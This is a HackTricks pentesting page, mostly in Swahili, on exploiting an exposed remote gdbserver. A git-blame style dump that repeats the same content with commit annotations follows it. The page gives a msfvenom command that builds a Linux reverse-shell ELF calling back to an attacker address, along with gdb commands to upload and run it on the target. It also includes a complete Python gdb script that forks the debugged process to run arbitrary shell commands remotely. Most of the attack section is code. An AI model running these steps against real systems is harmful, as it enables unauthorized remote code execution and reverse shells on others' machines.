hacktricks/network-services-pentesting/pentesting-remote-gdbserver.md

# Pentesting Remote GdbServer

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Mchakato wa haraka wa kutathmini udhaifu & kupenya**. Fanya pentest kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi pentesters - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

## **Taarifa za Msingi**

**gdbserver** ni zana inayowezesha ufuatiliaji wa programu kwa mbali. Inafanya kazi sambamba na programu inayohitaji ufuatiliaji kwenye mfumo mmoja, inayoitwa "lengo." Mchakato huu unaruhusu **GNU Debugger** kuungana kutoka mashine tofauti, "mwenyeji," ambapo msimbo wa chanzo na nakala ya binary ya programu inayofuatiliwa zimehifadhiwa. Muunganisho kati ya **gdbserver** na debugger unaweza kufanywa kupitia TCP au laini ya serial, ikiruhusu mipangilio ya ufuatiliaji yenye kubadilika.

Unaweza kufanya **gdbserver isikilize kwenye bandari yoyote** na kwa sasa **nmap haiwezi kutambua huduma hiyo**.

## Utekelezaji

### Pakia na Tekeleza

Unaweza kwa urahisi kuunda **elf backdoor na msfvenom**, ipakie na uitekeleze:
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf

chmod +x binary.elf

gdb binary.elf

# Set remote debuger target
target extended-remote 10.10.10.11:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

# You should get your reverse-shell
```
### Execute arbitrary commands

Kuna njia nyingine ya **kufanya debugger itekeleze amri zisizo na mpangilio kupitia** [**scripti maalum ya python iliyochukuliwa hapa**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345

# Load our custom gdb command `rcmd`.
source ./remote-cmd.py

# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash
r

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main
r

# Run the remote command, e.g. `ls`.
rcmd ls
```
Kwanza kabisa **unda skripti hii kwa ndani**:

{% code title="remote-cmd.py" %}
```python
#!/usr/bin/env python3

import gdb
import re
import traceback
import uuid


class RemoteCmd(gdb.Command):
def __init__(self):
self.addresses = {}

self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")

gdb.execute("set detach-on-fork off")
gdb.execute("set follow-fork-mode parent")

gdb.execute("set max-value-size unlimited")
gdb.execute("set pagination off")
gdb.execute("set print elements 0")
gdb.execute("set print repeats 0")

super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

def preload(self):
for symbol in [
"close",
"execl",
"fork",
"free",
"lseek",
"malloc",
"open",
"read",
]:
self.load(symbol)

def load(self, symbol):
if symbol not in self.addresses:
address_string = gdb.execute(f"info address {symbol}", to_string=True)
match = re.match(
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
)
if match and len(match.groups()) > 0:
self.addresses[symbol] = match.groups()[0]
else:
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')

return self.addresses[symbol]

def output(self):
# From `fcntl-linux.h`
O_RDONLY = 0
gdb.execute(
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
)

# From `stdio.h`
SEEK_SET = 0
SEEK_END = 2
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
if int(gdb.convenience_variable("len")) <= 0:
gdb.write("No output was captured.")
return

gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
gdb.execute('printf "%s\\n", (char*) $mem')

gdb.execute(f'call (int){self.load("close")}($fd)')
gdb.execute(f'call (int){self.load("free")}($mem)')

def invoke(self, arg, from_tty):
try:
self.preload()

is_auto_solib_add = gdb.parameter("auto-solib-add")
gdb.execute("set auto-solib-add off")

parent_inferior = gdb.selected_inferior()
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
child_pid = gdb.convenience_variable("child_pid")
child_inferior = list(
filter(lambda x: x.pid == child_pid, gdb.inferiors())
)[0]
gdb.execute(f"inferior {child_inferior.num}")

try:
gdb.execute(
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
)
except gdb.error as e:
if (
"The program being debugged exited while in a function called from GDB"
in str(e)
):
pass
else:
raise e
finally:
gdb.execute(f"inferior {parent_inferior.num}")
gdb.execute(f"remove-inferiors {child_inferior.num}")

self.output()
except Exception as e:
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
raise e
finally:
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')


RemoteCmd()
```
{% endcode %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Mchakato wa haraka wa kutathmini udhaifu & kupenya**. Fanya pentest kamili kutoka mahali popote kwa zana 20+ na vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi pentesters - tunatengeneza zana maalum, moduli za kugundua na kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`# Pentesting Remote GdbServer`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-03 10:42:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:19:02 +00:00			`<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:19:02 +00:00			`Mchakato wa haraka wa kutathmini udhaifu & kupenya. Fanya pentest kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi pentesters - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:27:29 +00:00			`{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
			`## Taarifa za Msingi`

Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:27:29 +00:00			`gdbserver ni zana inayowezesha ufuatiliaji wa programu kwa mbali. Inafanya kazi sambamba na programu inayohitaji ufuatiliaji kwenye mfumo mmoja, inayoitwa "lengo." Mchakato huu unaruhusu GNU Debugger kuungana kutoka mashine tofauti, "mwenyeji," ambapo msimbo wa chanzo na nakala ya binary ya programu inayofuatiliwa zimehifadhiwa. Muunganisho kati ya gdbserver na debugger unaweza kufanywa kupitia TCP au laini ya serial, ikiruhusu mipangilio ya ufuatiliaji yenye kubadilika.`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
			`Unaweza kufanya gdbserver isikilize kwenye bandari yoyote na kwa sasa nmap haiwezi kutambua huduma hiyo.`

			`## Utekelezaji`

			`### Pakia na Tekeleza`

			`Unaweza kwa urahisi kuunda elf backdoor na msfvenom, ipakie na uitekeleze:`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00			```bash
			`# Trick shared by @B1n4rySh4d0w`
			`msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf`

			`chmod +x binary.elf`

			`gdb binary.elf`

			`# Set remote debuger target`
			`target extended-remote 10.10.10.11:1337`

			`# Upload elf file`
			`remote put binary.elf binary.elf`

			`# Set remote executable file`
			`set remote exec-file /home/user/binary.elf`

			`# Execute reverse shell executable`
			`run`

			`# You should get your reverse-shell`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`### Execute arbitrary commands`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:27:29 +00:00			`Kuna njia nyingine ya kufanya debugger itekeleze amri zisizo na mpangilio kupitia [scripti maalum ya python iliyochukuliwa hapa](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00			```bash
			# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
			`target extended-remote 192.168.1.4:2345`

			# Load our custom gdb command `rcmd`.
			`source ./remote-cmd.py`

			`# Change to a trusty binary and run it to load it`
			`set remote exec-file /bin/bash`
			`r`

			`# Run until a point where libc has been loaded on the remote process, e.g. start of main().`
			`tb main`
			`r`

			# Run the remote command, e.g. `ls`.
			`rcmd ls`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00			`Kwanza kabisa unda skripti hii kwa ndani:`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
			`{% code title="remote-cmd.py" %}`
			```python
			`#!/usr/bin/env python3`

			`import gdb`
			`import re`
			`import traceback`
			`import uuid`


			`class RemoteCmd(gdb.Command):`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`def __init__(self):`
			`self.addresses = {}`

			`self.tmp_file = f'/tmp/{uuid.uuid4().hex}'`
			`gdb.write(f"Using tmp output file: {self.tmp_file}.\n")`

			`gdb.execute("set detach-on-fork off")`
			`gdb.execute("set follow-fork-mode parent")`

			`gdb.execute("set max-value-size unlimited")`
			`gdb.execute("set pagination off")`
			`gdb.execute("set print elements 0")`
			`gdb.execute("set print repeats 0")`

			`super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)`

			`def preload(self):`
			`for symbol in [`
			`"close",`
			`"execl",`
			`"fork",`
			`"free",`
			`"lseek",`
			`"malloc",`
			`"open",`
			`"read",`
			`]:`
			`self.load(symbol)`

			`def load(self, symbol):`
			`if symbol not in self.addresses:`
			`address_string = gdb.execute(f"info address {symbol}", to_string=True)`
			`match = re.match(`
			`f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE`
			`)`
			`if match and len(match.groups()) > 0:`
			`self.addresses[symbol] = match.groups()[0]`
			`else:`
			`raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')`

			`return self.addresses[symbol]`

			`def output(self):`
			# From `fcntl-linux.h`
			`O_RDONLY = 0`
			`gdb.execute(`
			`f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'`
			`)`

			# From `stdio.h`
			`SEEK_SET = 0`
			`SEEK_END = 2`
			`gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')`
			`gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')`
			`if int(gdb.convenience_variable("len")) <= 0:`
			`gdb.write("No output was captured.")`
			`return`

			`gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')`
			`gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')`
			`gdb.execute('printf "%s\\n", (char*) $mem')`

			`gdb.execute(f'call (int){self.load("close")}($fd)')`
			`gdb.execute(f'call (int){self.load("free")}($mem)')`

			`def invoke(self, arg, from_tty):`
			`try:`
			`self.preload()`

			`is_auto_solib_add = gdb.parameter("auto-solib-add")`
			`gdb.execute("set auto-solib-add off")`

			`parent_inferior = gdb.selected_inferior()`
			`gdb.execute(f'set $child_pid = (int){self.load("fork")}()')`
			`child_pid = gdb.convenience_variable("child_pid")`
			`child_inferior = list(`
			`filter(lambda x: x.pid == child_pid, gdb.inferiors())`
			`)[0]`
			`gdb.execute(f"inferior {child_inferior.num}")`

			`try:`
			`gdb.execute(`
			`f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'`
			`)`
			`except gdb.error as e:`
			`if (`
			`"The program being debugged exited while in a function called from GDB"`
			`in str(e)`
			`):`
			`pass`
			`else:`
			`raise e`
			`finally:`
			`gdb.execute(f"inferior {parent_inferior.num}")`
			`gdb.execute(f"remove-inferiors {child_inferior.num}")`

			`self.output()`
			`except Exception as e:`
			`gdb.write("".join(traceback.TracebackException.from_exception(e).format()))`
			`raise e`
			`finally:`
			`gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00

			`RemoteCmd()`
			```
			`{% endcode %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:19:02 +00:00			`<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>`
arte 2024-01-03 10:42:55 +00:00
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:19:02 +00:00			`Mchakato wa haraka wa kutathmini udhaifu & kupenya. Fanya pentest kamili kutoka mahali popote kwa zana 20+ na vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi pentesters - tunatengeneza zana maalum, moduli za kugundua na kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:27:29 +00:00			`{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
			`{% hint style="success" %}`
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:19:02 +00:00			`Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Angalia [mpango wa usajili](https://github.com/sponsors/carlospolop)!`
			`* Jiunge na 💬 [kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuatilie kwenye Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:19:02 +00:00			`* Shiriki hila za udukuzi kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:40:17 +00:00
			`</details>`
			`{% endhint %}`